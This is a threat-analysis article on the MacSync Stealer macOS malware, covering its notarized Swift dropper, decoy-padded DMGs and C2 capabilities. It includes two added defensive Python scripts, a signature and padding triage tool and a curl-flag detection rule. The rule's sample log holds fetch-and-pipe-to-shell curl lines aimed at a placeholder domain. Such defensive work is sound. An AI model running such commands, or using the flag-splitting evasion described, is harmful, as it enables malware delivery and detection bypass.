The Mac ecosystem faces a threat that plays in a different league: MacSync Stealer, malware specialised in stealing information from computers by abusing Apple's own trust mechanisms. Unlike the crude viruses of the past, this malicious software presents itself as a legitimate, trustworthy application, complete with a valid developer signature and a completed notarization process, and, as the analysis shows, it is reaching Spain and other European countries.
In its most recent variants, this malware family runs as an application written in Swift, signed and notarized by Apple. That lets it get past many of macOS's first-line security mechanisms, including Gatekeeper and XProtect. This significant leap makes early detection far harder and opens the door to the silent exfiltration of personal and corporate data in both home and professional environments.
What is MacSync Stealer and how has it evolved on macOS?
In its earliest appearances, infection relied on techniques that required explicit user actions: methods such as ClickFix, or the classic "copy and paste this into Terminal" instructions used to run malicious scripts. That approach demanded a high degree of manual interaction, which gave the user more opportunity to suspect that something was wrong and stop the installation before the damage became too great.
Analysis by Jamf Threat Labs, a leading Apple device security lab, describes a very different picture for the latest variant. According to their reports, MacSync Stealer has moved to a far more automated and silent infection model, reducing the signals visible to the victim and relying on the trust generated by Apple's code signing and notarization.
The trick is that the first stage of the attack is presented as an application developed in Swift, with a legitimate Developer ID, a valid code signature, and successful notarization. To the system, and to many users, this combination looks like trustworthy software, when in reality it is the first link in a carefully designed infection chain.
In many cases the threat arrives disguised as a messaging service, a productivity tool, or a synchronisation utility. With a name, logo and descriptions that sound perfectly harmless, this kind of image greatly reduces initial suspicion, a particularly worrying detail in European offices, public institutions and companies where the Mac is established as an everyday work tool.

A Swift installer that bypasses Gatekeeper and acts as a dropper
The campaign described by Jamf shows that the first component of the threat acts as a dropper written in Swift: an apparently legitimate installer whose real purpose is to prepare the ground and download the actual malicious code from a remote server. Initially, the Mach-O binary contained in the application appears signed and notarized and is associated with a genuine developer Team ID, so it easily passes Gatekeeper's initial checks.
In one of the analysed cases, the dropper was distributed as a DMG disk image bearing the name of a messaging application, under names such as "zk-call-messenger-installer-3.9.2-lts.dmg", hosted on a domain prepared for the campaign. The installer presents itself to the user as a calling and messaging tool, to be run with a double-click, without the convoluted steps of the older infection method.
Even when the package is signed, in some cases the attackers add instructions pushing the user to right-click and choose "Open". This is a common trick to get around the additional macOS warnings shown when an application does not come from the Mac App Store. That small detail, which many overlook, should raise red flags, especially when the software comes from an obscure website.
When the user launches the application, the dropper performs a series of environment checks before moving to the second stage. Among other steps, it verifies that the computer has a stable internet connection, checks certain system conditions, and, in some cases, waits a start-up delay of around 3600 seconds so that its behaviour does not look too fast or suspicious.
If the conditions set by the attackers are met, the program connects to a remote command-and-control server to download an encoded script or payload, typically in Base64, containing the MacSync Stealer core. From this stage on, that code is responsible for stealing information and controlling the compromised Mac, while the initial installer is limited to acting as a Trojan horse.

Inflated DMG files, decoy files, and download variations to evade detection
One of the features that most caught the researchers' attention is the use of large disk images padded with decoy files. The DMG associated with this installer is close to 25.5 MB, an unusually high volume for what, on the surface, appears to be a simple messaging application or utility.
According to Jamf Threat Labs, this size is reached by stuffing the package with irrelevant documents, such as PDFs or other embedded files that contribute nothing to the application's functionality. That mixture of filler content and the real component makes automated analysis by antivirus and other security solutions harder, since they must process more data and separate the legitimate from the illegitimate.
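The checks a defender would run on a downloaded installer follow directly from the two traits described in the two sections above: a Developer ID signature and notarization that Gatekeeper accepts, and a bundle padded with decoy documents. The following Python triage script is an added example, not code from the article or from Jamf Threat Labs. It assumes a placeholder Team ID allow-list (TEAMID0001 is not a real Apple Team ID), a heuristic list of file extensions normally found in a small app bundle, and a constructed fake bundle built in a temporary directory to exercise the padding check; the signature and Gatekeeper checks call the real codesign and spctl tools and therefore only run on macOS.

```python
import os
import re
import subprocess
import sys
import tempfile
from collections import defaultdict

# Team IDs your organisation has vetted. Constructed placeholder, not a real Apple Team ID.
TRUSTED_TEAM_IDS = {"TEAMID0001"}

# Extensions normally found inside a small messaging/utility bundle (heuristic, an assumption).
# Bytes in any other file type (PDFs, office documents, archives) count as filler.
EXPECTED_EXT = {"", ".plist", ".nib", ".strings", ".icns", ".png", ".car", ".dylib", ".json", ".lproj"}

# Constructed sample of what `codesign -dv --verbose=4` prints (on stderr) for a signed bundle.
SAMPLE_CODESIGN_OUTPUT = """Executable=/Volumes/Installer/Decoy.app/Contents/MacOS/Decoy
Identifier=com.example.decoy
Format=app bundle with Mach-O thin (arm64)
Authority=Developer ID Application: Example Corp (TEAMID0001)
TeamIdentifier=TEAMID0001
Sealed Resources version=2 rules=13 files=5
"""


def parse_team_id(codesign_output):
    """Extract the TeamIdentifier line from codesign's verbose output, or None if unsigned."""
    m = re.search(r"^TeamIdentifier=(\S+)$", codesign_output, re.MULTILINE)
    return m.group(1) if m else None


def bundle_composition(bundle_path):
    """Return (total_bytes, {extension: bytes}) for every file under a mounted image or .app."""
    by_ext, total = defaultdict(int), 0
    for root, _dirs, files in os.walk(bundle_path):
        for name in files:
            size = os.path.getsize(os.path.join(root, name))
            by_ext[os.path.splitext(name)[1].lower()] += size
            total += size
    return total, dict(by_ext)


def filler_ratio(bundle_path):
    """Fraction of the bundle's bytes held in file types that play no role in running the app."""
    total, by_ext = bundle_composition(bundle_path)
    if total == 0:
        return 0.0
    return sum(s for ext, s in by_ext.items() if ext not in EXPECTED_EXT) / total


def assess_signature(app_path):
    """macOS only: verify the seal, ask Gatekeeper, and compare the Team ID against the allow-list."""
    problems = []
    if subprocess.run(["codesign", "--verify", "--deep", "--strict", app_path]).returncode != 0:
        problems.append("signature missing or invalid")
    if subprocess.run(["spctl", "--assess", "--type", "execute", "-vv", app_path]).returncode != 0:
        problems.append("Gatekeeper rejects it (not notarized, or certificate revoked)")
    info = subprocess.run(["codesign", "-dv", "--verbose=4", app_path], capture_output=True, text=True)
    team = parse_team_id(info.stderr + info.stdout)
    if team not in TRUSTED_TEAM_IDS:
        problems.append(f"Team ID {team} is not on the allow-list")
    return problems


def triage(app_path, filler_threshold=0.5):
    """Combine the padding heuristic with the signature checks; returns a list of findings."""
    findings = []
    total, _ = bundle_composition(app_path)
    ratio = filler_ratio(app_path)
    if ratio > filler_threshold:
        findings.append(f"{ratio:.0%} of {total} bytes are filler documents (padding pattern)")
    if sys.platform == "darwin":
        findings.extend(assess_signature(app_path))
    return findings


def make_constructed_bundle(root):
    """Build a fake .app mimicking the padding pattern: a 4 KiB executable stub beside large decoy PDFs."""
    app = os.path.join(root, "Decoy.app")
    macos, res = os.path.join(app, "Contents", "MacOS"), os.path.join(app, "Contents", "Resources")
    os.makedirs(macos)
    os.makedirs(res)
    with open(os.path.join(macos, "Decoy"), "wb") as f:
        f.write(b"\xcf\xfa\xed\xfe" + b"\0" * 4092)      # Mach-O magic plus zero padding, not real code
    with open(os.path.join(app, "Contents", "Info.plist"), "wb") as f:
        f.write(b"<plist/>" * 128)
    for n in range(3):
        with open(os.path.join(res, f"decoy{n}.pdf"), "wb") as f:
            f.write(b"%PDF-1.4\n" + b"\0" * (256 * 1024))
    return app


def demo_constructed():
    """Run the triage on the constructed bundle; returns (filler_ratio, findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        app = make_constructed_bundle(tmp)
        return filler_ratio(app), triage(app)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    ratio, findings = (filler_ratio(target), triage(target)) if target else demo_constructed()
    print(f"filler ratio: {ratio:.2%}")
    for item in findings:
        print("-", item)
```

Run it with the path of a mounted .app as the only argument to triage a real download; with no argument it builds the constructed bundle and reports on that. The filler ratio is only a triage signal, not a verdict: a legitimate app that ships documentation as PDFs will score high too, which is why the script reports the byte counts rather than deciding on its own.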
After the disk image is mounted and the application is run, the dropper begins a scan of the local environment, checking everything from connectivity to specific system parameters. Only when it is clear that the situation is suitable does it contact the remote infrastructure to download the second module. In many cases these payloads run mainly in memory, leaving a small footprint on disk and further complicating any later forensic detection.
The code downloaded in this second stage corresponds to MacSync, an evolution of the earlier family known as Mac.c. Independent research shows that this agent is built in Go and has a varied set of capabilities that go well beyond password theft, following the trend of other modern threats aimed at macOS.
On top of all this, the attackers have even fine-tuned the download commands used in this process. Tools such as curl are invoked with unusual parameter combinations, for instance by splitting the usual -fsSL string into flags such as -fL and -sS, and by adding options such as --noproxy, with the aim of evading detection rules based on recurring patterns and improving the reliability of the connections to their servers.
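A detection rule keyed on the literal string -fsSL misses the split spellings described above. As an added example (not code from the article, from Jamf Threat Labs, or from any vendor product), the Python below normalises curl command lines taken from process-execution logs into a canonical flag set before matching, so that -fsSL, -fL -sS and --silent --location all hit the same rule, and any use of --noproxy is surfaced on its own. The log lines are constructed samples, example.invalid is a reserved placeholder domain, and the rule names are this example's own.

```python
import os
import re
import shlex

# Single-letter curl flags and their long spellings. A cluster such as -fsSL is one token but
# expands to one flag per letter, which is what lets split spellings normalise identically.
SHORT_TO_LONG = {
    "f": "--fail", "s": "--silent", "S": "--show-error", "L": "--location", "k": "--insecure",
    "o": "--output", "O": "--remote-name", "H": "--header", "x": "--proxy", "A": "--user-agent",
    "d": "--data", "X": "--request",
}
# Options whose value is the next token (or glued on, as in -o/tmp/x or --noproxy=*).
TAKES_VALUE = {"--output", "--noproxy", "--header", "--proxy", "--user-agent", "--data", "--request"}

# Constructed process-execution log lines; example.invalid is a reserved placeholder domain.
SAMPLE_LOG = [
    "curl -fsSL https://example.invalid/install.sh | sh",
    "curl -fL -sS --noproxy '*' https://example.invalid/stage2.b64 -o /tmp/.s",
    "curl -L --silent --fail https://example.invalid/update",
    "curl -o report.pdf https://example.invalid/report.pdf",
    "wget -q https://example.invalid/other",
]


def _first_command(cmdline):
    """Keep only the text before the first shell operator, so `curl ... | sh` yields the curl part."""
    return re.split(r"\|\||&&|\||;", cmdline, maxsplit=1)[0]


def normalise_curl(cmdline):
    """Return (frozenset of long-form flags, tuple of positional args) or None if this is not curl."""
    try:
        argv = shlex.split(_first_command(cmdline))
    except ValueError:          # unbalanced quotes: not parseable here, leave it to other rules
        return None
    if not argv or os.path.basename(argv[0]) != "curl":
        return None
    flags, positional = set(), []
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--"):
            name, has_eq, _ = tok.partition("=")
            flags.add(name)
            if name in TAKES_VALUE and not has_eq:
                i += 1                      # skip the option's value
        elif tok.startswith("-") and len(tok) > 1:
            cluster = tok[1:]
            for pos, ch in enumerate(cluster):
                long_name = SHORT_TO_LONG.get(ch, "-" + ch)
                flags.add(long_name)
                if long_name in TAKES_VALUE:
                    if pos == len(cluster) - 1:
                        i += 1              # value is the next token
                    break                   # otherwise the rest of the cluster is the value
        else:
            positional.append(tok)
        i += 1
    return frozenset(flags), tuple(positional)


def classify(cmdline):
    """Apply the rules to one command line; returns a rule name or None."""
    norm = normalise_curl(cmdline)
    if norm is None:
        return None
    flags, _ = norm
    if "--noproxy" in flags:
        return "curl-noproxy-download"          # the option the article singles out; surface it on its own
    if {"--silent", "--location"} <= flags:
        return "curl-silent-follow-download"    # covers -fsSL and every split spelling of it
    return None


def scan(lines):
    """Return [(line_number, rule)] for every line that triggers a rule."""
    hits = []
    for number, line in enumerate(lines, start=1):
        rule = classify(line)
        if rule:
            hits.append((number, rule))
    return hits


if __name__ == "__main__":
    for number, rule in scan(SAMPLE_LOG):
        print(f"line {number}: {rule}: {SAMPLE_LOG[number - 1]}")
```

The point of the design is that the rule never sees the raw spelling: whatever order or grouping the flags arrive in, the matcher only ever compares canonical long names, so the evasion the article describes costs the attacker nothing but also gains them nothing against this rule. The fourth sample line, a plain file download, does not match, which keeps the rule from flagging ordinary curl use.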

From data theft to a remote-control platform
The core of MacSync Stealer goes beyond the basic infostealer stage: the technical analysis describes an agent with full command-and-control (C2) capability, ready to maintain persistent communication with the compromised machine and receive instructions in real time.
Among the functions attributed to this family, the following stand out: theft of credentials, browser cookies, bank card data and cryptocurrency wallets, as well as the exfiltration of any kind of file of interest to the attackers. Information stored in the macOS Keychain, together with data from browsers such as Safari, Chrome or Firefox, already forms a highly attractive set of targets for financial fraud campaigns and corporate espionage.
Another critical point is the ability to load additional modules on demand. This modular approach lets the compromised machine become a kind of malicious "Swiss Army knife": today focused on harvesting passwords and logging keystrokes, tomorrow encrypting files, moving laterally across the corporate network, or deploying new remote-access tools.
For users and businesses in Spain and other European countries, this shift from a simple data thief to a flexible remote-control platform represents a significant rise in the level of risk. An infected Mac is no longer just a one-off source of stolen information; it also becomes a gateway to the business networks, cloud services, or critical systems the device has access to.
This situation fits a broader trend observed by various cybersecurity firms: the steady growth of infostealers and modular Trojans targeting macOS, driven by the rising market share of Apple machines and the economic profile of their users, which makes them a very attractive target for online fraud.

Apple's response and the limits of macOS's built-in protections
Following alerts from Jamf Threat Labs and other security firms, Apple revoked the code-signing certificates associated with the Team ID used in the MacSync Stealer campaign. With this step, the system stops trusting applications signed with that identifier and blocks new builds that attempt to use it to distribute malware.
At the same time, the company updated its internal protection mechanisms, such as XProtect and Gatekeeper, with new detection rules and lists of known hashes and signatures. In current macOS versions these blocklists are refreshed regularly without user intervention, so it is essential to keep the system up to date and apply the available updates in order to benefit from those fixes and improvements.
Nevertheless, experts insist that the MacSync Stealer case illustrates a general trend in macOS malware: attackers increasingly try to embed their code in signed and notarized executables so that it appears to be a fully legitimate and trustworthy application. When they succeed, the chances of the user receiving clear warnings drop sharply.
Reports from Jamf and other firms stress that even when Apple revokes compromised certificates, cybercriminals can register new developer IDs and repeat the same strategy, changing small details to evade the newly added rules. This cat-and-mouse game forces the native macOS defences to be complemented with additional layers.
This context reinforces the idea that security cannot rely solely on automatic protection. Although Gatekeeper, XProtect and the notarization process have raised the bar considerably, attacks like MacSync Stealer show that trust mechanisms can be turned against users whenever someone manages to slip their application into the verification chain.

Impact on Mac users in Spain and Europe, and good defensive practices
The spread of the Mac into offices, universities and homes in Spain and other European countries has made macOS a very attractive target for criminal groups. It is no longer a niche platform: many organisations integrate macOS into their infrastructure, which makes threats such as MacSync Stealer a serious problem in the region.
Experts recommend reinforcing both technical capabilities and everyday habits. A first step, seemingly simple but fundamental, is to keep macOS and its applications up to date and make regular backups. Because Apple frequently releases new signatures and blocking rules for these kinds of threats, neglecting security updates leaves the door open to variants that have already been documented and addressed.
The importance of limiting software installation to the Mac App Store or known developers is also emphasised. Even when an installer appears signed and notarized, that label is no longer an absolute guarantee of safety, as this case shows. Downloading applications from links received by email, in messages, or on untrustworthy websites greatly increases the risk of infection.
Another key aspect is paying attention to the permissions each application requests. Access to the keychain, user documents, browser history, or accessibility features is a permission that should be granted sparingly, especially to free utilities of dubious origin. Many successful infections rely directly on excessive permissions that the user accepted without reviewing them.
In professional environments, especially within the European Union, it is advisable to supplement Apple's protection with macOS-specific security solutions. EDR tools and clear policies on software downloads and installation are essential. These measures matter most in companies subject to data-protection regulations, where an incident involving credential theft or an information leak can lead to penalties and a loss of trust.

Everything around MacSync Stealer shows the extent to which Mac malware is no longer easy to detect. Attackers rely on signed and notarized executables, pad disk images with decoy files, download second-stage payloads from remote servers, and deploy agents capable of stealing data and maintaining remote control of computers. In this scenario the old notion that "Macs don't get viruses" is outdated, and protection now means combining Apple's native defences with good usage habits and constant vigilance so that our computer does not become the weakest link in the chain.